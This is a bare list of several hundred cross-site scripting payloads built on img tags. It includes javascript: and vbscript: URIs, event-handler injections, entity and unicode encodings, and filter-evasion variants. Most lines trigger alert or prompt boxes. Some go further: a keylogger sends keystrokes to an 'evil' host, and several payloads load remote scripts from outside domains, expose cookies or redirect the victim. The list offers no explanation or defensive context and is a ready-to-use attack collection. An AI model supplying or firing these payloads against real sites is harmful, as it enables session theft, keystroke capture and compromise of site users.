<;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>;
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascript:alert(String.fromCharCode(88###83###83))>
<IMG src=”javascript:alert(‘X13SS’)”
<IMG src=”jav ascript:alert(‘XaSS’);”>
<IMG src=”jav ascript:alert(‘XbSS’);”>
<IMG src=”jav ascript:alert(‘XcSS’);”>
<IMG src=” javascript:alert(‘XdSS’);”>
<img src=”javascript:alert(‘XSS’);”>
<img src=”javascript:alert(‘XSS’)”>
<IMG src=”javascript:alert(‘XSS’);”>
<IMG src=javascript:alert(‘XSS’)>
<IMG src=JaVaScRiPt:alert(‘XSS’)>
<IMG src=JaVaScRiPt:alert(“XSS”)>
<;IMG SRC=”;javascript:alert(‘;XSS’;);”;>;
<;IMG SRC=”;javascript:alert(‘;XSS’;)”;
<;IMG SRC=javascript:alert(‘;XSS’;)>;
<IMG SRC=” javascript:alert(‘XSS’);”>
<IMG SRC=” javascript:alert(‘XSS’);”>
<IMG SRC=”jav ascript:alert(‘XSS’);”>
<IMG SRC=”jav ascript:alert(‘XSS’);”>
<IMG SRC=”jav ascript:alert(‘XSS’);”>
<IMG SRC=”jav ascript:alert(‘XSS’);”>
<IMG SRC=”javascript:alert(‘XSS’);”>
<IMG SRC=”javascript:alert(‘XSS’)”
<IMG SRC=jav ascript:alert(XSS);>
<IMG SRC=javascript:alert(‘XSS’)>
<IMG SRC=javascript:alert(“XSS”)>
<IMG SRC=javascript:alert(XSS)>
<IMG SRC=javascript:alert(XSS);>
<IMG SRC=javascript:alert(XSS)
<IMG SRC = “ j a v a s c r i p t : a l e r t ( ‘ X S S ‘ ) “ >
<IMGSRC=”javascript:alert(‘XSS’)”>
IMG SRC=”javascript:alert(‘XSS’);”>
<IMG SRC=jAVasCrIPt:alert(XSS)>
<;IMG SRC=JaVaScRiPt:alert(‘;XSS’;)>;
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
<IMG SRC=JaVaScRiPt:alert(“XSS”)>
<IMG SRC=`javascript:confirm(1)`>
<IMG SRC=`javascript:confirm(document.cookie)`>
<IMG SRC=”jav ascript:confirm(document.location);”>
<IMG SRC=”javascript:confirm(document.location);”>
<IMG SRC=”javascript:confirm(document.location)”
<IMG SRC=javascript:confirm(document.location)>
<IMG SRC=JaVaScRiPt:confirm(document.location)>
<IMG SRC=javascript:confirm(&quot;XSS&quot;)>
<IMG SRC=JaVaScRiPt:confirm(&quot;XSS<WBR>&quot;)>
<IMG SRC=javascript:confirm(String.fromCharCode(88,83,83))>
<img src=”javascript:document.vulnerable=true;”>
<img SRC=”jav ascript:document.vulnerable=true;”>
<img SRC=”javascript:document.vulnerable=true;”>
<img SRC=”javascript:document.vulnerable=true;”
<IMG SRC=`javascriptGalert(“)`>
<IMG SRC=`javascriptGalert(“Look its, ‘XSS’”)`>
<IMG SRC=`javascriptGalert(\”XSS\”)`>
<IMG SRC=`javascript:javascript:alert(1)`>
<IMG SRC=”jav ascript:javascript:alert(1);”>
<IMG SRC=”jav ascript:javascript:alert(1);”>
<IMG SRC=”jav ascript:javascript:alert(1);”>
<IMG SRC=”jav ascript:javascript:alert(1);”>
<IMG SRC=”javascript:javascript:alert(1);”>
<IMG SRC=”javascript:javascript:alert(1)”
<IMG SRC=javascript:javascript:alert(1)>
<IMG SRC=javascript:prompt(document.location)>
<IMG SRC=JaVaScRiPt:prompt(document.location)>
<img src=javascript:while([{}]);>
“><img src=javascript:while([{}]);>
<IMG SRC=javascrscriptipt:alert(‘XSS’)>
<img src=javcript:alert(/1231/);>
<IMG SRC=jav..?..S’)>
<IMG+SRC=”jav&#x09;ascript:alert(1);”>
<IMG SRC=”jav&#x09;ascript:alert(<WBR>’XSS’);”><IMG SRC=”jav&#x0A;ascript:alert(<WBR>’XSS’);”><IMG SRC=”jav&#x0D;ascript:alert(<WBR>’XSS’);”>
<;IMG SRC=”;jav&;#x09;ascript:alert(‘;XSS’;);”;>;
<;IMG SRC=”;jav&#x09;ascript:alert(‘;XSS’;);”;>;
<IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”>
<IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”>
<IMG SRC=\”jav&#x09;ascript:alert(‘XSS’);\”>
<IMG SRC=jav&#x09;ascript:alert(XSS);>
<IMG SRC=”jav&#x09;ascript:confirm(document.location);”>
<IMG SRC=”jav&#x09;ascript:confirm(<WBR>document.location);”>
<IMG+SRC=”jav&#x0A;ascript:alert(1);”>
<IMG SRC=”jav&#x0A;ascript:alert(<WBR>’XSS’);”>
<;IMG SRC=”;jav&;#x0A;ascript:alert(‘;XSS’;);”;>;
<IMG SRC=”jav&#x0A;ascript:alert(‘XSS’);”>
<IMG SRC=”jav&#x0A;ascript:alert(‘XSS’);”>
<IMG SRC=\”jav&#x0A;ascript:alert(‘XSS’);\”>
<IMG SRC=”jav&#x0A;ascript:confirm(document.location);”>
<IMG SRC=”jav&#x0A;ascript:confirm(<WBR>document.location);”>
<IMG+SRC=”jav#x0D;ascript:alert(1);”>
<IMG SRC=”jav&#x0D;ascript:alert(<WBR>’XSS’);”>
<;IMG SRC=”;jav&;#x0D;ascript:alert(‘;XSS’;);”;>;
<IMG SRC=”jav&#x0D;ascript:alert(‘XSS’);”>
<IMG SRC=”jav&#x0D;ascript:alert(‘XSS’);
<IMG SRC=\”jav&#x0D;ascript:alert(‘XSS’);\”>
<IMG SRC=”jav&#x0D;ascript:confirm(document.location);”>
<IMG SRC=”jav&#x0D;ascript:confirm(<WBR>document.location);”>
<IMG+SRC=j&#X41vascript:alert(1)>
<IMG src=”livescript:[code]”>
<;IMG SRC=”;livescript:[code]”;>;
<IMG SRC=”livescript:[code]”>
<IMG SRC=”livescript:[code][/code]”>
<IMG SRC=”livescript:[code]”> (netscape only)
<img src=”livescript:document.vulnerable=true;”>
<img src=”Mario Heiderich says that svg SHOULD not be executed trough image tags” onerror=”javascript:document.write(‘\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e’);”></img>
<img/src=”mars.png”alt=”mars”>
<IMG src=”mocha:[code]”>
<;IMG SRC=”;mocha:[code]”;>;
<IMG SRC=”mocha:[code]”>
<IMG SRC=”mocha:[code]”> (netscape only)
<img src=”mocha:document.vulnerable=true;”>
#”><img src=M onerror=alert(‘XSS’);>
<IMG SRC_NeatHtmlReplace=” &#14; javascript:alert(‘XSS’);”>
<IMG SRC_NeatHtmlReplace=”http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<IMG SRC_NeatHtmlReplace=”javascript:alert(&quot;XSS&quot;)”>
<IMG SRC_NeatHtmlReplace=”javascript:alert(String.fromCharCode(88,83,83))”>
<IMG SRC_NeatHtmlReplace=” j a v a s c r i p t : a l e r t ( ‘ X S S ‘ ) “ >
<IMG SRC_NeatHtmlReplace=”javascript:alert(‘XSS’);”>
<IMG SRC_NeatHtmlReplace=”javascript:alert(‘XSS’)”>
<IMG SRC_NeatHtmlReplace=”JaVaScRiPt:alert(‘XSS’)”>
<IMG SRC_NeatHtmlReplace=”jav&#x09;ascript:alert(‘XSS’);”>
<IMG SRC_NeatHtmlReplace=”jav&#x0A;ascript:alert(‘XSS’);”>
<IMG SRC_NeatHtmlReplace=”jav&#x0D;ascript:alert(‘XSS’);”>
<IMG SRC_NeatHtmlReplace=”livescript:[code]”>

<IMG SRC_NeatHtmlReplace=”mocha:[code]”>
<IMG SRC_NeatHtmlReplace=’vbscript:msgbox(“XSS”)’>
<img src=``&NewLine; onerror=alert(1)&NewLine;
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src=”domain.js”></script>’));)>
<IMG SRC=”/” onerror=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
←`<img/src=` onerror=alert(1)> — !>
←`<img/src=` onerror=alert(1)> — !>
<img src=/ onerror=alert(1)>
<img+src+onerror=alert(1)>
<img src=��>��onerror=alert(9)>
<IMG SRC=/ onerror=”alert(String.fromCharCode(88
<IMG SRC=/ onerror=”alert(String.fromCharCode(88,83,83))”></img>
<img src onerror /” ‘“= alt=alert(1)//”>
<img src onerror /” ‘“= alt=javascript:alert(1)//”>
←`<img/src=` onerror=confirm(1)> — !>
<img/ src//’onerror/’’/=confirm(1)//’>
<img/src=` onerror=confirm(1)>
“<img/src=` onerror=confirm(1)>”
“>←`<img/src=` onerror=confirm(1)> — !>
“><img src=”” onerror=”document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(49)+String.fromCharCode(41)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))”>
“><img src=””onerror=”document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(49)+String.fromCharCode(41)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))”>
<img src=”#” onerror=”$.getScript(‘domain.js’)”>
<IMG SRC=”/” onerror=”jav&#x09;ascript:alert(‘XSS’);”>
<img/ src=`~` onerror=prompt(1)>
<img/src=@ onerror = prompt(‘1’)
<img/src=`` onerror=this.onerror=confirm(1)
<img/src=`` onerror=this.onerror=confirm(1)
<img src=”#” onerror=”var a=String.fromCharCode(47);$.getScript(a+a+’domain.sj’+a+’4091')”>
<img src=# onerror\x3D”javascript:alert(1)” >
<IMG SRC=”/” onerror=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC=/ onkeydown=”alert(String.fromCharCode(88,83,83))”></img>
<IMG SRC=/ onkeypress=”alert(String.fromCharCode(88,83,83))”></img>
<IMG SRC=/ onkeyup=”alert(String.fromCharCode(88,83,83))”></img>
<IMG SRC=/ onload=”alert(String.fromCharCode(88,83,83))”></img>
<img src=//\ onload=confirm(1)>
<img src=”#” onload=”s=document.createElement(‘script’);s.src=’domain.js’+Math.random();document.body.appendChild(s)” border=”0">
<IMG SRC= onmouseover=”alert(‘xxs’)”>
<IMG SRC= onmouseover=”alert(“xxs”)”>
<IMG SRC=# onmouseover=”alert(‘xxs’)”>
<IMG SRC=# onmouseover=”alert(“xxs”)”>
<img/src=q onerror=’new Function`al\ert\`1\``’>
<img/src=q onerror=’new Function`al\ert\`OPENBUGBOUNTY\``’>
<img/src=renwax23%0A/**/onerror=eval(‘al’%2b’ert(1)’)>
<img src=””><SCRIPT/ASYNC/SRC=”/a3a?a?L”>
<img src=” →</script><svg/onload=alert(1)//”>
<img src=” →</script><svg/onload=alert(1)//”><! — <script>
<img srcset=popup=1; onerror=popup=1;>
<img src=”test.jpg” alt =”``onload=xss()”>
<img src=test.jpg?value=”>Yes, we are still inside a tag!”>
<img src=’test’ onmouseover=’alert(2)’>
<img src=”/” =_=” title=”onerror=’/**/prompt(1)’”>
<img src=”/” =_=” title=”onerror=’prompt(1)’”>
“><img src=”/” =_=” title=”onerror=’prompt(1)’”>
<img SRC=’vbscript:document.vulnerable=true;’>
<IMG SRC=’vbscript:msgbox(“anyunix”)’>
<IMG SRC=’vbscript:msgbox(document.location)’>
<IMG src=’vbscript:msgbox(“XmSS”)’>
<;IMG SRC=’;vbscript:msgbox(“;XSS”;)’;>;
<IMG SRC=’vbscript:msgbox(“XSS”)’>
<IMG SRC=’vbscript:msgbox(“XSS”)’>
<IMG SRC=’vbscript:msgbox(\”XSS\”)’>
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
<img src\x00=x onerror=”javascript:alert(1)”>
<img src\x09=x onerror=”javascript:alert(1)”>
“><img/src=x%0Aonerror=prompt`1`>
<img src\x10=x onerror=”javascript:alert(1)”>
<img src\x11=x onerror=”javascript:alert(1)”>
<img src\x12=x onerror=”javascript:alert(1)”>
<img src\x13=x onerror=”javascript:alert(1)”>
`”’><img src=’#\x27 onerror=javascript:alert(1)>
<img src\x32=x onerror=”javascript:alert(1)”>
<img src\x47=x onerror=”javascript:alert(1)”>
<img src=”&#x68;&#x74;&#x74;&#x70;&#x3a;&#x2f;&#x2f;&#x77;&#x77;&#x77;&#x2e;&#x62;&#x61;&#x69;&#x64;&#x75;&#x2e;&#x63;&#x6f;&#x6d;&#x2f;&#x69;&#x6d;&#x67;&#x2f;&#x62;&#x64;&#x6c;&#x6f;&#x67;&#x6f;&#x2e;&#x67;&#x69;&#x66;”;>
<IMG SRC=&#x6A&#x61&#x76&#x61..?..&#x58&#x53&#x53&#x27&#x29>
<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29>
<IMG src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>;
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<img src=”x:%90" title=”onerror=alert(1)//”>
<img src=x[9,10,12,13,32]onerror=”alert(1)”>
<img src=x:alert(alt) onerror=eval(src) alt=0>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
<img src=”x:alert” onerror=”eval(src%2b’(0)’)”>
<img src=”x:alert” onerror=”eval(src%2b’(1)’)”>
<img/src=x alt=confirm(1) onmouseover=eval(alt)>
<img src=”x” alt=”’’onmouseover=alert(1)”>
<img src=”x:gif” onerror=”alert(0)”>
<img src=”x:gif” onerror=”eval(‘al’%2b’ert(/renwax23/)’)”>
<img src=”x:gif” onerror=”eval(‘al’%2b’lert(0)’)”>
<img src=”x:gif” onerror=”window[‘al\u0065rt’]
<img src=”x:gif” onerror=”window[‘al\u0065rt’](0)”></img>
<img src=”x:gif” onerror=”window[‘al\u0065rt’](0)”></img>
<img src=”x:gif” onerror=”window[‘al\u0065rt’] (/’renwax23'/)”></img>
<img/src=”x”/id=”javascript”/name=”:confirm”/alt=”(1)”/onerror=”eval(id + name + alt)”>
<img src=”x:kcf” onerror=”alert(1)”>
<IMG SRC=x onabort=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onafterprint=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onbeforeprint=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onbeforeunload=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onblur=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x oncanplay=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x oncanplaythrough=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onchange=”alert(String.fromCharCode(88,83,83))”>
<img src=x on*chr*Error=”javascript:log(*num*)”/>
<IMG SRC=x onclick=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x oncontextmenu=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x oncopy=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x oncuechange=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x oncut=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x ondblclick=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x ondrag=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x ondragend=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x ondragenter=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x ondragleave=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x ondragover=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x ondragstart=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x ondrop=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x ondurationchange=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onemptied=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onended=”alert(String.fromCharCode(88,83,83))”>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x onerror=”&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
<img src=x onerror=&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#39;&#115;&#99;&#114;&#105;&#112;&#116;&#39;&#41;&#41;&#46;&#115;&#114;&#99;&#61;&#39;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#120;&#115;&#115;&#56;&#46;&#110;&#101;&#116;&#47;&#63;&#13;&#99;&#61;&#81;&#105;&#104;&#97;&#76;&#39;>
<IMG SRC=”/x” onerror=” &#14; javascript:alert(‘XSS’);”>
>’>”><img src=x onerror=alert(0)>
“><img src=x onerror=alert(0)>
<img src=x onerror=”alert(1)”
<img/src==”x onerror=alert(1)//”>
<img src=x onerror=alert(123) />
/>.<<img src=x onerror=alert(1)//&gt;>&lt;&gt;&page=1
<img/src=’x’onerror=alert(1)>//INJECTX
<img src=x onerror=alert(24)> 29
“><img src=x onerror=’alert(document.domain)’>
<img src=x onerror=alert(/insight-labs/)>B<p
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
“><img src=x onerror=alert(String.fromCharCode(88,83,83));>
<IMG SRC=x onerror=”alert(String.fromCharCode(88,83,83))”>
<img src=x onerror=alert(‘XSS’);>
“><img src=x onerror=alert(‘XSS’);>
“><img src=x onerror=’alert(xzz)’>
<img src=x onerror=appendChild(createElement(‘script’)).src=’//jsa}’ />
<img/src=”x”/onerror=”[boom]”>
><img src=\”x\” onerror=\”confirm(0)\”/>
“\”><img src=\”x\” onerror=\”confirm(0)\”/>”,
“><img src=x onerror=confirm(1); …
@”><img src=x/onerror=confirm(1)>xss
<img src=x onerror=’confirm(domain+/ — /+cookie)’>”>
><imgsrc=x onerror=confirm.onerror=confirm(1)>
“\”><imgsrc=x onerror=confirm.onerror=confirm(1)>”,
“><img src=x onerror=confirm(‘x’) />]
“><img src=x onerror=confirm`/XSS/`>//
“><img src=x onerror=co\u006efir\u006d`1`>
<img src=x onerror=document.body.appendChild(document.createElement(‘script’)).src=’domain.js’>
<img src=x onerror=”document.location=’http:&#x2F;&#x2F;xss.cx’”;>
<img src=x onerror=’document.onkeypress=function(e){fetch(“//evil?k=”+String.fromCharCode(e.which))},this.remove();’>
<img src=x onerror=’document.onkeypress=function(e){fetch(“http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>
<img src=x onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,116,119,47,51,51,56,49,34))>
<img src=x onerror=eval(String.fromCharCode(document.body.appendChild(createElement(“script”)).src=”http://xss.tw/3381"))>
<IMG SRC=”/x” onerror=”jav%00ascript:alert(‘XSS’);”>
“><img src=x onerror=javascript:alert(`1`)>
“><img src=x onerror=javascript:alert(‘1’)>
“><img src=x onerror=javascript:alert(“1”)>
“><img src=x onerror=javascript:alert((`1`))>
“><img src=x onerror=javascript:alert((‘1’))>
“><img src=x onerror=javascript:alert((“1”))>
“><img src=x onerror=javascript:alert(1)>
“><img src=x onerror=javascript:alert(`A`)>
“><img src=x onerror=javascript:alert(‘A’)>
“><img src=x onerror=javascript:alert(“A”)>
“><img src=x onerror=javascript:alert((`A`))>
“><img src=x onerror=javascript:alert((‘A’))>
“><img src=x onerror=javascript:alert((“A”))>
“><img src=x onerror=javascript:alert((A))>
“><img src=x onerror=javascript:alert(A)>
><IMG SRC=x onerror=javascript:alert(&quot;Xss-By-Muhaddi&quot;)>
><IMG SRC=x onerror=javascript:alert(&quot;Xss&quot;)>
��><IMG SRC=x onerror=javascript:alert(&quot;Xss&quot;)>
<IMG SRC=”/x” onerror=”jav ascript:alert(‘XSS’);”>
<img src=x onerror=”javascript:window.onerror=alert;throw 1">
<Img src = x onerror = “javascript: window.onerror = alert; throw 1”>
<Img src = x onerror = “javascript: window.onerror = alert; throw XSS”>
<IMG SRC=”/x” onerror=”jav&#x0D;ascript:alert(‘XSS’);”>
<img/src=”x”/onerror=”[JS-F**K Payload]”>
><imgsrc=x onerror=prompt(0);>
“><img src=x onerror=prompt(0)>
<img src=x onerror=prompt(1);>
<img src=x onerror=prompt`1`>
<img src=x onerror=prompt(1);>
“><img src=x onerror=prompt(1)>
“><img src=x onerror=prompt(1);>
#><img src=x onerror=prompt(1)>
#��><img src=x onerror=prompt(1)>
<img src=x onerror=prompt(1)>//INJECTX
<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>
“><img src=x onerror=prompt(document.location);>#”><img src=x onerror=prompt(document.location);>
‘ “/><img src= x onerror=prompt(/xss/)>
“><img src=x onerror=prompt(/xss by me/)>
“><img src=x onerror=prompt(“xss”);>#”><img src=x onerror=prompt(“xss”);>
<img src=x onerror=URL=’javascript:confirm(1)’>
<img src=x onerror=window.open(‘data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4=’);>
<img src=x onerror=window.open(‘http://google.com');>
“><img src=x onerror=window.open(‘https://www.google.com/');>
“><img src=x onerror=window.open(‘https://www.google.com/');>
<img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’domain.js’”></img>
<img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’domain.js’” width=”0" height=”0"></img><img src=x onerror=with(document)body.appendChild(document.createElement(‘script’)).src=”domain.js”></img>
<img src=x onerror=\x00"javascript:alert(1)”>
<img src=x onerror=\x09"javascript:alert(1)”>
<img src=x onerror=\x10"javascript:alert(1)”>
<img src=x onerror=\x11"javascript:alert(1)”>
<img src=x onerror=\x12"javascript:alert(1)”>
<img src=x onerror=\x32"javascript:alert(1)”>
><IMG SRC=x onerror=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
��><IMG SRC=x onerror=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>
><img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>
“<img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>”
“\”><img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>”,
<img src=x onerror=x.onerror=m=’%22%3E%3Cimg%20src%3Dx%20onerror%3Dx.onerror%3Dprompt%28/xss/.source%29%3E’;d=unescape(m);document.write(d);prompt(String.fromCharCode(88,83,83))>
“<img src=x onerror=x.onerror=m=’%22%3E%3Cimg%20src%3Dx%20onerror%3Dx.onerror%3Dprompt%28/xss/.source%29%3E’;d=unescape(m);document.write(d);prompt(String.fromCharCode(88,83,83))>”
“/><img src=x onerror=x.onerror=prompt(0)>
“\”/><img src=x onerror=x.onerror=prompt(0)>”
“/><img src=x onerror=x.onerror=prompt&lpar;/xss/.source&rpar;;confirm(0);confirm(1)>
“\”/><img src=x onerror=x.onerror=prompt&lpar;/xss/.source&rpar;;confirm(0);confirm(1)>”
<IMG SRC=x onhashchange=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x oninput=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x oninvalid=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onkeydown=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onkeypress=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onkeyup=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onload=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onloadeddata=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onloadedmetadata=”alert(String.fromCharCode(88,83,83))”>
<img src=x onload=prompt(1) onerror=alert(1) onmouseover=prompt(1)>
<IMG SRC=x onloadstart=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onmessage=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onmousedown=”alert(String.fromCharCode(88,83,83))”>
